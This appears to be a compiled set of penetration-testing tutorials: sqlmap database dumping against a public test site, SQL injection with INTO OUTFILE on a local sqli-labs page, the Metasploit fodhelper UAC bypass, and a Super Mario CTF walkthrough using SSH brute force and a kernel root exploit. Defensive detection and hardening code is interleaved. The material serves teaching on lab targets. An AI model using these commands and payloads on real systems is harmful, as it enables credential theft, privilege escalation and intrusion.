Showing posts with label Kali Linux. Show all posts

Database Penetration Testing using Sqlmap (Part 1)

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features
·         Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems.
·         Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
·         Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
·         Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
·         Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
·         Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
·         Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where the relevant columns' names contain strings like name and pass.
·         Support to download and upload any file from the database server's underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
·         Support to execute arbitrary commands and retrieve their standard output on the database server's underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
·         Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server's underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.

·         Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.


These options can be used to enumerate the back-end database management system information, structure and data contained in the tables.


Some websites let you pick a product from a picture gallery; if you look at the URL you will notice that the product is loaded by its product ID number.
Let's take an example.

When an attacker visits this kind of website, the first thing he checks is whether the parameter is vulnerable to SQL injection, before launching the attack.

Let's check how an attacker verifies a SQL injection vulnerability.
The attacker tries to break the query in order to trigger an error message; if an error message comes back, it confirms that the web application is affected by SQL injection.
http://testphp.vulnweb.com/artists.php?artist=1'

From the screenshot you can see we received an error message, so now we can run a SQL injection attack on the web server to fetch database information.


Databases

For database penetration testing we always choose sqlmap; this tool is very helpful for beginners who are unable to retrieve database information manually or are unfamiliar with SQL injection techniques.
Open the terminal in your Kali Linux and type the following command, which starts the SQL injection attack on the targeted website.
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --batch

-u: target URL
--dbs: enumerate DBMS databases
--batch: never ask for user input; sqlmap goes with its default behaviour whenever input would be required


Here from the given screenshot you can see we have successfully retrieved the database name "acuart".

Tables
As we know, a database is a set of records organised in multiple tables, so now we use another command to fetch all the table names from inside the database.

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables --batch

-D: DBMS database to enumerate (the database name fetched above)
--tables: enumerate DBMS database tables


As the screenshot shows, we have enumerated all the table names in the database. There are 8 tables inside database "acuart":
T1: artists
T2: carts
T3: categ
T4: featured
T5: guestbook
T6: pictures
T7: products
T8: users


Columns
Now we will enumerate the column names of a chosen table. Since we know there is a users table inside the database acuart and we want all the column names of the users table, we run another command for column enumeration.

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch
-T: DBMS table to enumerate (the table name fetched above)
--columns: enumerate DBMS database table columns



Get data from a table
Step by step we have uncovered many details of the database, but the last and most important step is to retrieve the information stored in the columns of a table. Hence at last we run a command which dumps the contents of the users table.
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump --batch
--dump: dump DBMS database table entries


Here from the given screenshot you can see it has dumped the entire contents of the table users; a users table mainly contains the login credentials of other users. You can use these credentials to log in to the server on behalf of other users.


Dump All
The last command is the most powerful command in sqlmap and will save your time in database penetration testing; it performs all the above functions at once and dumps the entire database, including table names, columns and so on.
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --dump-all --batch


This gives you all the information at once, including the database name as well as the tables' records.
Try it yourself!!!
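From the defender's side, the probing sequence above (a quote appended to artist=, then sqlmap's own requests) leaves a recognisable trail in the web server's access log. The following Python is an added example, not part of sqlmap or the original post; the log lines are constructed in the Apache combined format, and the source addresses and timestamps are made up.

```python
"""Flag SQL-injection probing (manual or sqlmap-driven) in Apache combined
access logs. Added example, not part of sqlmap or the original post; the
sample log lines at the bottom are constructed, not captured traffic."""
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Apache "combined" format: ip ident user [time] "req" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Traces a probe leaves in the URL-decoded query string.
SQLI_RE = re.compile(
    r"""'|"|--|\bunion\b.*\bselect\b|\band\b\s+\d+\s*=\s*\d+|\bsleep\s*\(|\binformation_schema\b""",
    re.I,
)

def classify(line):
    """Return the reasons a request looks like SQLi probing (empty list = clean)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsable"]
    reasons = []
    if m["ua"].lower().startswith("sqlmap"):
        reasons.append("sqlmap user-agent")  # sqlmap's default User-Agent names itself
    hit = SQLI_RE.search(unquote_plus(urlsplit(m["url"]).query))
    if hit:
        reasons.append("sqli pattern %r in query" % hit.group(0))
    return reasons

def summarize(lines):
    """Count flagged requests per (source IP, path): a scan shows up as a burst."""
    bursts = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m and classify(line):
            bursts[(m["ip"], urlsplit(m["url"]).path)] += 1
    return bursts

# Constructed sample: a manual quote test, then sqlmap taking over.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2017:13:55:36 +0000] "GET /artists.php?artist=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2017:13:55:40 +0000] "GET /artists.php?artist=1%27 HTTP/1.1" 500 221 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2017:13:56:01 +0000] "GET /artists.php?artist=1%20AND%201%3D1 HTTP/1.1" 200 5123 "-" "sqlmap/1.1.8#stable (http://sqlmap.org)"',
    '203.0.113.7 - - [10/Oct/2017:13:56:02 +0000] "GET /artists.php?artist=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL-- HTTP/1.1" 200 6001 "-" "sqlmap/1.1.8#stable (http://sqlmap.org)"',
    '198.51.100.9 - - [10/Oct/2017:13:57:10 +0000] "GET /artists.php?artist=2 HTTP/1.1" 200 4980 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line))
    print(summarize(SAMPLE_LOG))
```

The patterns are heuristics for a first triage; the per-source burst count is what separates a scanner from an odd single request.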

Dumping Database using Outfile

In our previous article you learned the basic concepts of SQL injection, but in some scenarios you will find that basic knowledge and tricks fail. Today we are going to use the SELECT ... INTO OUTFILE statement, which is the easiest way of exporting table records into a text file or Excel (CSV) file.

This statement lets a user write table data very quickly to a text file on the server machine. SELECT ... INTO OUTFILE writes the selected rows to a file and allows column and row terminators to be specified to control the output format. The output file is created directly by the MySQL server, so the filename must be given with the path where the user wants the file to be written on the server host. The file must not already exist on the server; it cannot be overwritten. A user requires the FILE privilege to run this statement.

Let’s start!!
Lesson 7

Open the browser and enter the following URL:
http://localhost:81/sqli/Less-7/?id=1

From the screenshot you can read "you are in..... Use outfile"; now let's try to break this statement.


OKAY! The query has been broken successfully: we received an error message when we used a single quote (') to break the query, which confirms that it is vulnerable.


After a lot of effort the query finally gets fixed; if you look closely, the steps for SQL injection are similar to the previous chapter, only the technique for fixing the query is different.


Now the following query will dump the result into a text file. Here you need to give the path where the file should be written on the server host. The file must not already exist on the server, so always use a new text file name for each write of database information.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,2,3 into outfile "/xampp/htdocs/sqli/Less-7/hack1.txt" --+

From the screenshot you can see that it is still showing an error message; now open another tab to view the output of the resulting query.


Now append the file name hack1.txt to the URL to check the output of the above query.


Hence you can see we get the output of the executed query inside the text file. This also saves the hack1.txt file on the server machine.


Execute the following query to retrieve the database name using a union injection written into a new text file.
http://localhost:81/sqli/Less-7/?id=1')) union select 1,2,database() into outfile "/xampp/htdocs/sqli/Less-7/hack2.txt" --+


Hence you can see we have successfully got "security" as the database name.


The next query will write all the table names stored in the database into another text file.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() into outfile "/xampp/htdocs/sqli/Less-7/hack3.txt" --+


From the screenshot you can read the following table names:
T1: emails
T2: referers
T3: uagents
T4: users


Now we'll try to find out the column names of the users table using the following query.
http://localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' into outfile "/xampp/htdocs/sqli/Less-7/hack4.txt" --+


Hence you can see it contains many columns; I chose only two columns for further enumeration.
C1: username
C2: password


At last execute the following query to read all usernames and passwords from the columns of the users table.
http://localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(username),group_concat(password) from users into outfile "/xampp/htdocs/sqli/Less-7/hack5.txt" --+


From the screenshot you can read the usernames and passwords saved inside the text file.
Note: you can try the same attack using an Excel file; the attacker only needs to change hack1.txt to hack1.csv, which saves the output as a CSV file that Excel opens.
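The Less-7 lookup above is injectable because the request parameter becomes part of the SQL text. The following Python is an added example, not code from sqli-labs or the original article: it rebuilds in SQLite the (('...')) wrapping that the page's 1')) payload implies (SQLite has no INTO OUTFILE, so the UNION alone shows the leak) with a hardened handler beside it; the table and rows are constructed.

```python
"""Less-7 style lookup beside a hardened one. Added example, not code from
sqli-labs or the original article; the schema and rows are constructed, and
the (('...')) wrapping is inferred from the page's 1')) payload."""
import sqlite3

# The page's payload shape; SQLite has no INTO OUTFILE, so the UNION alone shows the leak.
PAYLOAD = "1')) union select 1,group_concat(username),group_concat(password) from users --+"

def make_db():
    """Constructed users table with the two columns the article enumerates."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT, email TEXT);
        INSERT INTO users VALUES (1, 'alice', 'pw-alice', 'alice@example.test');
        INSERT INTO users VALUES (2, 'bob', 'pw-bob', 'bob@example.test');
    """)
    return conn

def lookup_vulnerable(conn, raw_id):
    """String formatting: whatever arrives in ?id= becomes SQL text."""
    sql = "SELECT id, username, email FROM users WHERE id=(('%s'))" % raw_id
    return conn.execute(sql).fetchall()

def lookup_hardened(conn, raw_id):
    """Reject anything that is not a plain integer, then bind the value with a
    placeholder so the driver never lets it alter the statement."""
    if not str(raw_id).isdigit():
        raise ValueError("id must be a non-negative integer")
    sql = "SELECT id, username, email FROM users WHERE id = ?"
    return conn.execute(sql, (int(raw_id),)).fetchall()

def leaked_credentials(rows):
    """Return (usernames, passwords) from a UNION-appended row, or None."""
    for _, col2, col3 in rows:
        if isinstance(col2, str) and "," in col2:
            return col2, col3
    return None

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, PAYLOAD))
    try:
        lookup_hardened(db, PAYLOAD)
    except ValueError as exc:
        print("hardened:", exc)
```

On MySQL the server-side counterparts are a restrictive secure_file_priv setting and not granting the FILE privilege to the web application's account; neither setting is discussed on the page.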

Bypass UAC Protection of Remote Windows 10 PC (Via FodHelper Registry Key)

Hello friends! Today we are going to share a new article on how to bypass Windows 10 UAC once you have compromised the victim's system. A new module has been added to Metasploit to obtain admin access on Windows 10.
Attacker: Kali Linux

Target: Windows 10


This module will bypass Windows 10 UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.

use exploit/windows/local/bypassuac_fodhelper
msf exploit(bypassuac_fodhelper) > set session 1
msf exploit(bypassuac_fodhelper) > exploit

Hence you can see another meterpreter session (session 2) has opened, which means we have successfully exploited the target once again; now let's check the user privilege.
meterpreter > getsystem

Awesome!!!! We got admin privileges successfully.
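Because the module deletes the registry key after the payload runs, a point-in-time registry check will miss this bypass; event-based detection does not. The following Python is an added example, not part of Metasploit or the original post: it correlates Sysmon-style registry value-set events (ID 13) with fodhelper.exe process creation (ID 1). The events are constructed, and the hijacked handler path comes from public documentation of the technique, not from the page.

```python
"""Detect the fodhelper UAC bypass from Sysmon-style events. Added example, not
part of Metasploit or the original post; the events below are constructed.
HIJACK_KEY is the handler path the technique is publicly documented to abuse
(under HKCU\\Software\\Classes); the page itself does not name it."""
from datetime import datetime

HIJACK_KEY = r"\software\classes\ms-settings\shell\open\command"

def _ts(ev):
    return datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")

def detect_fodhelper_bypass(events, window_s=120):
    """Return alerts. A write under HIJACK_KEY followed by fodhelper.exe starting
    for the same user within window_s is the high-confidence case; the bare
    write is still reported, because the module deletes the key once the
    payload runs and a later point-in-time check would find nothing."""
    alerts, writes = [], []
    for ev in sorted(events, key=_ts):
        if ev["EventID"] == 13 and HIJACK_KEY in ev["TargetObject"].lower():
            writes.append(ev)
            alerts.append({"severity": "medium", "user": ev["User"],
                           "detail": "%s wrote %s" % (ev["Image"], ev["TargetObject"])})
        elif ev["EventID"] == 1 and ev["Image"].lower().endswith(r"\fodhelper.exe"):
            for w in writes:
                age = (_ts(ev) - _ts(w)).total_seconds()
                if w["User"] == ev["User"] and 0 <= age <= window_s:
                    alerts.append({"severity": "high", "user": ev["User"],
                                   "detail": "fodhelper.exe started %.0fs after %s hijacked the ms-settings handler"
                                             % (age, w["Image"])})
    return alerts

# Constructed events (Sysmon field names; SID, host, paths and times made up).
HKU = r"HKU\S-1-5-21-1111-2222-3333-1001"
SAMPLE_EVENTS = [
    {"EventID": 13, "UtcTime": "2017-10-10 13:55:36.120", "User": r"DESKTOP\victim",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": HKU + r"\Software\Classes\ms-settings\Shell\Open\command\DelegateExecute"},
    {"EventID": 1, "UtcTime": "2017-10-10 13:55:38.004", "User": r"DESKTOP\victim",
     "Image": r"C:\Windows\System32\fodhelper.exe", "TargetObject": ""},
    {"EventID": 13, "UtcTime": "2017-10-10 14:02:00.000", "User": r"DESKTOP\victim",
     "Image": r"C:\Program Files\Updater\updater.exe",
     "TargetObject": HKU + r"\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"EventID": 1, "UtcTime": "2017-10-10 16:30:00.000", "User": r"DESKTOP\admin",  # legitimate launch
     "Image": r"C:\Windows\System32\fodhelper.exe", "TargetObject": ""},
    {"EventID": 13, "UtcTime": "2017-10-10 17:10:00.000", "User": r"DESKTOP\victim",
     "Image": r"C:\Users\victim\AppData\Local\Temp\stage.exe",
     "TargetObject": HKU + r"\Software\Classes\ms-settings\Shell\Open\command"},
]

if __name__ == "__main__":
    for alert in detect_fodhelper_bypass(SAMPLE_EVENTS):
        print(alert["severity"], alert["detail"])
```

A fodhelper.exe launch with no preceding write (the 16:30 event) is a user opening Optional Features and stays silent, which keeps the high-severity alert specific.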

Hack the Super Mario (CTF Challenge)

Hello friends!! You might have played THE SUPER MARIO game once in your childhood, and no wonder if the thought of hacking the game has struck your mind. Today we are going to make that true, and for that you need to download the new Super Mario VM from here.

Credit for developing this VM goes to Mr_h4sh, who has hidden 2 flags inside this lab as a challenge for hackers. The level of the challenge is Intermediate.
Let’s breach!!!

As you know, we always start with enumeration, so open the terminal in your Kali Linux and go for an aggressive scan with nmap.

nmap -p- -A 192.168.0.5


Since port 22 and port 8180 are open for SSH and HTTP respectively, I chose port 8180 for enumeration, but from the screenshot you can see I didn't get any remarkable result.
dirb http://192.168.0.5:8180


Then I moved on to a directory brute-force attack with a bigger wordlist using the following command:
dirb http://192.168.0.5:8180 /usr/share/wordlists/dirb/big.txt
In the screenshot below you can see it has found a file named vhosts; let's explore it in the browser.


Now open vhosts in the browser as http://192.168.0.5:8180/vhosts. Here vhosts stands for virtual hosts, a method for hosting multiple domains on a single server. From inside vhosts I came to know that the server name is mario.supermariohost.local.


Let's add mario.supermariohost.local to /etc/hosts as a new host entry.
cd /etc
vim hosts


Now type "192.168.0.5 mario.supermariohost.local" inside the vim editor to add it to /etc/hosts, then type :wq to save it.


Now type cat hosts to check the added host name; from the screenshot you can see it has been added successfully.

Then I visited mario.supermariohost.local in the browser and finally got Mario as a browser game, but it is not working.


Since we know ports 22 and 8180 were open and we didn't get much information from enumerating port 8180, we now move to port 22 for SSH enumeration, so I prepared a dictionary in order to retrieve credentials for logging in to the SSH server.
The dictionary contains usernames taken from the famous characters of Mario; you can look up these names on Google too.
Inside a text editor type the following names, one per line: Mario, luigi, peach, toad, yoshi, and save the file as user on the desktop.


Use John the Ripper to generate a password dictionary with the following command; here --rules enables the wordlist mangling rules and --stdout writes the generated candidates to standard output instead of cracking, which we redirect into a file named pass on the desktop.
john --wordlist=user --rules --stdout > pass


Finally we have the username dictionary as user and the password dictionary generated by john as pass; now we have to find the matching combination of user and pass in order to retrieve credentials for SSH login. I chose hydra for password cracking; you can choose any other password cracking tool as well.
hydra -L user -P pass 192.168.0.5 ssh
From the given screenshot you can read the matched combination of username luigi and password luigi1 for the SSH server.


Now log in over SSH as luigi using the command shown in the screenshot.
Password: luigi1
Yeeppiii!!!! Finally we have logged in to the SSH server.


uname -a
Here we come to know that the Linux kernel version on supermariohost is 3.13.0; let's look for an exploit for it on Google.


Yes, there is an exploit for 3.13.0: overlayfs local root in Ubuntu. Download it from here into your Kali Linux.


From the screenshot you can see I have downloaded the exploit as Mario.c for privilege escalation.


Now type the command shown in the screenshot to download Mario.c onto the target system.
The file is successfully downloaded; now type another command to compile Mario.c
gcc Mario.c -o mario


./mario
id
cd /root
ls
Awesome!!! We have got root privileges, and from the screenshot you can see that inside the root directory I found a zip file named flag.zip.


Now type the following command to copy flag.zip to the desktop of your Kali Linux
scp /root/flag.zip root@192.168.0.6:/root/Desktop


fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u flag.zip
As shown in the screenshot, PASSWORD FOUND!!!: pw == ilovepeach; now you can unzip the file using this password.
unzip flag.zip
It will ask for a password; give the above password to unzip it, and if you look at the image you will notice it contains flag.txt
cat flag.txt
1st FLAG: Well done :D If you reached this it means you got root, congratulations.


Now follow the steps below in order to complete the second challenge.
iptables -L
Here from the screenshot you can see a new network has been added on the remote system.


arp -n
Now the target system is forwarding to a new IP, 192.168.122.112


ls -la
Found a directory named .bak


cd /.bak
ls
cd users
cd luigi
ls
There are two files inside it; let's read them one by one.
cat message
Hi Luigi,
Since you've been messing around with my host, at this point I want to return the favour.
This is a "war", you "naughty" boy!


cat id_rsa.pub
The highlighted word in the text looks like a username for logging in to the SSH server.


Let's make sure by logging in: ssh -i id_rsa warluigi@192.168.122.112


Great!! All assumptions gave a positive result.
Again check the kernel version
uname -a
Woooww!! It is the same version, so we can use our Mario.c exploit for root privileges. Hence repeat the above steps as shown in the images.


The file is successfully downloaded; now type another command to compile Mario.c
gcc Mario.c -o mario
./mario


id
cd /root
ls -la
Here I found two important files: 1st hint.txt, 2nd flag2.zip. Before unzipping flag2.zip we should look at the hint.txt file.
cat .hint.txt
"Peach Loves Me" might be the password for decrypting the flag2.zip file.
Now let's copy flag2.zip to the desktop of Kali Linux using the following command again
scp /root/flag2.zip root@192.168.0.6:/root/Desktop


unzip flag2.zip
When it asks for the password, type "Peach Loves Me"
It contains flag2.txt; type cat flag2.txt to open this file.
2nd FLAG: Congratulations on your second flag!

Wonderful!!! We have caught both flags